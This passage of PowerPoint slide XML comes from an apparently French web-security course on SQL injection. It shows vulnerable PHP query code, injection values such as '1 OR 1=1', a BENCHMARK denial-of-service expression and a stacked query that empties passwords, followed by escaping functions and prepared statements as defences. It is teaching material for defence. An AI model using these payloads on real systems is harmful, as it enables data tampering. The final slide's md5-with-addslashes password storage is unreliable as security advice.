            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Éviter les messages d’erreurs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le but est de repérer une erreur MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>requête fragile et injection possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>On peut aider les attaques avec :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> error : You have an error in your SQL syntax ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>check the manual that corresponds to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>server version for the right syntax to use near ’’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and pass=’xxx’’ at line 1</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Injection SQL : principe</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemple de code dangereux :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$content = $_POST[’content’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$id = $_POST[’id’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>("UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>comments</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>."SET text=’$content’ WHERE id=$id");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Si $id = "1 OR 1=1";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>tous les commentaires sont modifiés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" smtClean="0"/>
              <a:t>Si $content = "X’, approved=’1";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>le commentaire est approuvé automatiquement.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Risques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Suivant le type d’injection SQL, les risques sont variés :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Accès à des données interdites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Modification de données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Modification de schéma de la base de données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Denial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t> of Service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>BENCHMARK(100000000, MD5(RAND())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Méthodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les requêtes multiples (par défaut, non autorisées)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>SELECT ... ; UPDATE user SET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>=’’ ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exécution de requêtes SELECT grâce à UNION.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Se protéger contre l’injection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$id = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) $_POST[’id’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Échappement spécifique à SQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Chaque extension de SGBD a sa fonction de protection :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$content = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($_POST[’content’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$content = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>($_POST[’content’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$content = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>quote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($_POST[’content’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$content = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>pg_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($_POST[’content’]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Résultat :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>content=’’ OR ’1’=’1’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" smtClean="0"/>
              <a:t>! content=’\’ OR \’1\’=\’1’</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Se protéger contre l’injection</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Échappement nécessaire mais non suffisant </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Requêtes préparées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>C’est une protection qui remplace l’échappement manuel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>bdd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>prepare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>('SELECT nom FROM Etudiant WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>prenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>= ? AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&lt;= ?');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>prenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'], $_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>']));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Protéger les données</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Stocker les données de façon cryptées</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>// Stockage du mot de passe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>hashcodé</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>$query = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("INSERT INTO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Login.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>name,pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) VALUES </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>('%s','%s');", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>), md5($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>sql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>connection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
